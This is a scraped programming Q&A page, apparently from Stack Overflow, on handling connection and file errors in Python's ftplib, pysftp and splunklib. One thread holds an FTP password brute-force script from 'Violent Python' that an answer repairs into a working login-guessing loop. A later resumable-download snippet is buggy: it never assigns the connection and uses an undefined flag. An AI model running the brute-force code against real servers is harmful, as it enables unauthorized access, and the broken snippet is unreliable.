I have a short code that ftps a small file into a server.
session = ftplib.FTP("192.168.0.164", "admin", "admin")
file = open("path/test.txt", "rb")
try:
session.storbinary("STOR application/test.txt", file)
except:
print("failed")
else:
print("success!")
file.close()
In the above piece I changed the IP address to so it would fail (there is no 192.168.0.164 device) and it doesn't print failed like it's supposed to. In the terminal I get a
"connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond" error.
if I mistype the path, I also don't get a failed print on the terminal.
If I type in the correct IP the success part does work.
Am I using the try/except wrong?
UPDATE:
Current code looks like this:
file = open("path/test.txt", "rb")
try:
session = ftplib.FTP("192.168.0.161", "admin", "admin")
session.storbinary("STOR application/test.txt", file)
except:
print("Unable to reach host")
else:
print("success!")
session.quit()
finally:
print ("DONE!!")
file.close()
I figure the ftplib.all_errors will catch all errors (host unreachable, and file not found). It seems to catch the unable to reach host errors, but no file not found errors.
Am I using the try/except wrong?
Your syntax is correct, but Python is not actually reaching the try block at all.
When you call session = ftplib.FTP(host, ...) where host is unreachable, the code will stop in its tracks there. That's because FTP.__init__() greedily calls self.connect(). This will in turn call socket.create_connection(), which will not succeed for an unreachable host.
So, you'd need to modify to:
with open("path/test.txt", "rb") as file:
try:
session = ftplib.FTP("192.168.0.164", "admin", "admin")
session.storbinary("STOR application/test.txt", file)
except Exception as e:
print("failed")
print(e)
else:
print("success!")
finally:
session.quit()
Related
I am trying to connect to an account on Splunk via Python and Bash. I can connect to the website fine and it prints what I want it to, in the terminal, when I log in correctly. However when I use the wrong log in details, it prints a large error message saying 'login failed' that I want to try and condense to one line only.
This is what I am using to connect to Splunk:
service = client.connect(
host=splunk_config['host'],
port=splunk_config['port'],
username=splunk_config['username'],
password=splunk_config['password'])
I want to do something along the lines of:
if (service errors):
print ("Failed to connect")
else:
print ("Successfully connected")
Without the exception and guessing you're using splunklib I would imagine you need something like:
try:
service = client.connect(
host=splunk_config['host'],
port=splunk_config['port'],
username=splunk_config['username'],
password=splunk_config['password'])
print("Login succesfull")
except splunklib.binding.AuthenticationError as e:
print("Login failed")
I am using pysftp with Python 3.7 to setup an SFTP client script.
My code (simplified and minimal):
import pysftp
import sys
# Variables
destination_dir = 'BOGUS_DIR'
server = 'myserver.mydomain.com'
user = 'my_user'
key = 'my_key'
port = 22
# cnopts
mycnopts = pysftp.CnOpts()
mycnopts.log = True
mycnopts.compression = True
mycnopts.ciphers = None
mycnopts.hostkeys = None
try:
with pysftp.Connection(server, username=user, private_key=key, port=port, cnopts=mycnopts) as sftp:
try:
with sftp.cd(destination_dir):
print("OK cd worked")
except:
print("NOT OK cd failed")
e = sys.exc_info()
print("Exception: {0}".format(e))
if sftp.isdir(destination_dir):
print("OK isdir")
else:
print("NOT OK isdir")
except:
print("Connection failure.")
e = sys.exc_info()
print("Exception: {0}".format(e))
The output is: OK cd worked
But I know for a fact that BOGUS_DIR does not exist. It is like pysftp does not raise the exception on cd(), or I am catching it wrong (hence my python code is not properly done).
Same for isdir(), whatever I put as parameter, it always returns True even if the directory does not exist.
If I change my connection parameters for something wrong, I do catch the connection failure exception.
Is pyftp processing exceptions wrong, or is my code at fault here? Should I not trust pysftp and use Paramiko directly?
If directory is not exist you getting an error from remote shell where you trying to run the command. In this code you trying to catch the exception that can be raised only by sftp. Maybe, you should check the status code that should be returned by sftp module after each executed shell command
Ok I figured it out, I think.
sftp.cd() does not raise an exception if the directory does not exist. Only operations on the bad directory do. So if I modify my code like this:
....
try:
with sftp.cd(destination_dir):
sftp.listdir()
print("OK ce worked")
except:
print("NOT OK cd failed")
e = sys.exc_info()
print("Exception: {0}".format(e))
....
This way I get an exception since sftp.listdir() cannot work with an inexistent directory.
Almost like sftp.cd does not do anything other than set the value of the current directory, without actually doing anything with it.
I am following along with code from the Violent Python book. This is what I have here, testing a brute-force of an FTP:
import ftplib
def bruteLogin(hostname, passwdFile):
pF = open(passwdFile, 'r')
for line in pF.readlines():
userName = line.split(':')[0]
passWord = line.split(':')[1].strip('\r').strip('\n')
print("[+] Trying: "+userName+"/"+passWord)
try:
ftp = ftplib.FTP(hostname)
ftp.login(userName, passWord)
print('\n[*] ' + str(hostname) +\
' FTP Logon Succeeded: '+userName+"/"+passWord)
ftp.quit()
return (userName, passWord)
except Exception as e:
pass
print('\n[-] Could not brute force FTP credentials.')
return (None, None)
host = '192.168.95.179'
passwdFile = 'C:/Users/Andrew/Documents/Python Stuff/userpass.txt'
bruteLogin(host, passwdFile)
Using an example 'userpass.txt' consisting of:
administrator:password
admin:12345
root:secret
guest:guest
root:root
When running (I am using Python 3.4, by the way) it is supposed to return a result of this:
[+] Trying: administrator/password
[+] Trying: admin/12345
[+] Trying: root/secret
[+] Trying: guest/guest
[*] 192.168.95.179 FTP Logon Succeeded: guest/guest
The above is an example of a successful logon, of course. When actually running it, it returns the "Could not find the brute force FTP credentials", but seems to only try the very first line of the text file, instead of passing through the exception and trying the other lines, as described in the book. Any ideas?
You should print that "Could not find..." line only after the loop has completed. Your current code does it with every iteration, so if the first attempt doesn't succeed, it is printed already.
Also, it is easier to reason about exceptions if you keep the try block as short as possible and the exception to be caught as specific as possible. That reduces the number of cases where an exception is handled and lets all other, unrelated exceptions explode and become visible, helping you debug your code in the places that you don't expect to raise exceptions. Your code could look like this then:
def bruteLogin(hostname, passwdFile):
pF = open(passwdFile, 'r')
ftp = ftplib.FTP(hostname) # reuse the connection
for line in pF.readlines():
userName, passWord = line.split(':', 1) # split only once, the pw may contain a :
passWord = passWord.strip('\r\n') # strip any of the two characters
print("[+] Trying: {}/{}".format(userName, passWord))
try:
ftp.login(userName, passWord)
except ftplib.error_perm:
continue
else:
print('\n[*] {} FTP Logon Succeeded: {}/{}'.format(hostname, userName, passWord))
ftp.quit()
return userName, passWord
print('\n[-] Could not brute force FTP credentials.')
return None, None
I have a FTP connection from which I am downloading many files and processing them in between. I'd like to be able to check that my FTP connection hasn't timed out in between. So the code looks something like:
conn = FTP(host='blah')
conn.connect()
for item in list_of_items:
myfile = open('filename', 'w')
conn.retrbinary('stuff", myfile)
### do some parsing ###
How can I check my FTP connection in case it timed out during the ### do some parsing ### line?
Send a NOOP command. This does nothing but check that the connection is still going and if you do it periodically it can keep the connection alive.
For example:
conn.voidcmd("NOOP")
If there is a problem with the connection then the FTP object will throw an exception. You can see from the documentation that exceptions are thrown if there is an error:
socket.error and IOError: These are raised by the socket connection and are most likely the ones you are interested in.
exception ftplib.error_reply: Exception raised when an unexpected reply is received from the server.
exception ftplib.error_temp: Exception raised when an error code signifying a temporary error (response codes in the range 400–499) is received.
exception ftplib.error_perm: Exception raised when an error code signifying a permanent error (response codes in the range 500–599) is received.
exception ftplib.error_proto: Exception raised when a reply is received from the server that does not fit the response specifications of the File Transfer Protocol, i.e. begin with a digit in the range 1–5.
Therefore you can use a try-catch block to detect the error and handle it accordingly.
For example this sample of code will catch an IOError, tell you about it and then retry the operation:
retry = True
while (retry):
try:
conn = FTP('blah')
conn.connect()
for item in list_of_items:
myfile = open('filename', 'w')
conn.retrbinary('stuff', myfile)
### do some parsing ###
retry = False
except IOError as e:
print "I/O error({0}): {1}".format(e.errno, e.strerror)
print "Retrying..."
retry = True
I'm downloading files from a flaky FTP server that often times out during file transfer and I was wondering if there was a way to reconnect and resume the download. I'm using Python's ftplib. Here is the code that I am using:
#! /usr/bin/python
import ftplib
import os
import socket
import sys
#--------------------------------#
# Define parameters for ftp site #
#--------------------------------#
site = 'a.really.unstable.server'
user = 'anonymous'
password = 'someperson#somewhere.edu'
root_ftp_dir = '/directory1/'
root_local_dir = '/directory2/'
#---------------------------------------------------------------
# Tuple of order numbers to download. Each web request generates
# an order numbers
#---------------------------------------------------------------
order_num = ('1','2','3','4')
#----------------------------------------------------------------#
# Loop through each order. Connect to server on each loop. There #
# might be a time out for the connection therefore reconnect for #
# every new ordernumber #
#----------------------------------------------------------------#
# First change local directory
os.chdir(root_local_dir)
# Begin loop through
for order in order_num:
print 'Begin Proccessing order number %s' %order
# Connect to FTP site
try:
ftp = ftplib.FTP( host=site, timeout=1200 )
except (socket.error, socket.gaierror), e:
print 'ERROR: Unable to reach "%s"' %site
sys.exit()
# Login
try:
ftp.login(user,password)
except ftplib.error_perm:
print 'ERROR: Unable to login'
ftp.quit()
sys.exit()
# Change remote directory to location of order
try:
ftp.cwd(root_ftp_dir+order)
except ftplib.error_perm:
print 'Unable to CD to "%s"' %(root_ftp_dir+order)
sys.exit()
# Get a list of files
try:
filelist = ftp.nlst()
except ftplib.error_perm:
print 'Unable to get file list from "%s"' %order
sys.exit()
#---------------------------------#
# Loop through files and download #
#---------------------------------#
for each_file in filelist:
file_local = open(each_file,'wb')
try:
ftp.retrbinary('RETR %s' %each_file, file_local.write)
file_local.close()
except ftplib.error_perm:
print 'ERROR: cannot read file "%s"' %each_file
os.unlink(each_file)
ftp.quit()
print 'Finished Proccessing order number %s' %order
sys.exit()
The error that I get:
socket.error: [Errno 110] Connection timed out
Any help is greatly appreciated.
Resuming a download through FTP using only standard facilities (see RFC959) requires use of the block transmission mode (section 3.4.2), which can be set using the MODE B command. Although this feature is technically required for conformance to the specification, I'm not sure all FTP server software implements it.
In the block transmission mode, as opposed to the stream transmission mode, the server sends the file in chunks, each of which has a marker. This marker may be re-submitted to the server to restart a failed transfer (section 3.5).
The specification says:
[...] a restart procedure is provided to protect users from gross system failures (including failures of a host, an FTP-process, or the underlying network).
However, AFAIK, the specification does not define a required lifetime for markers. It only says the following:
The marker information has meaning only to the sender, but must consist of printable characters in the default or negotiated language of the control connection (ASCII or EBCDIC). The marker could represent a bit-count, a record-count, or any other information by which a system may identify a data checkpoint. The receiver of data, if it implements the restart procedure, would then mark the corresponding position of this marker in the receiving system, and return this information to the user.
It should be safe to assume that servers implementing this feature will provide markers that are valid between FTP sessions, but your mileage may vary.
A simple example for implementing a resumable FTP download using Python ftplib:
def connect():
ftp = None
with open('bigfile', 'wb') as f:
while (not finished):
if ftp is None:
print("Connecting...")
FTP(host, user, passwd)
try:
rest = f.tell()
if rest == 0:
rest = None
print("Starting new transfer...")
else:
print(f"Resuming transfer from {rest}...")
ftp.retrbinary('RETR bigfile', f.write, rest=rest)
print("Done")
finished = True
except Exception as e:
ftp = None
sec = 5
print(f"Transfer failed: {e}, will retry in {sec} seconds...")
time.sleep(sec)
More fine-grained exception handling is advisable.
Similarly for uploads:
Handling disconnects in Python ftplib FTP transfers file upload
To do this, you would have to keep the interrupted download, then figure out which parts of the file you are missing, download those parts and then connect them together. I'm not sure how to do this, but there is a download manager for Firefox and Chrome called DownThemAll that does this. Although the code is not written in python (I think it's JavaScript), you could look at the code and see how it does this.
DownThemll - http://www.downthemall.net/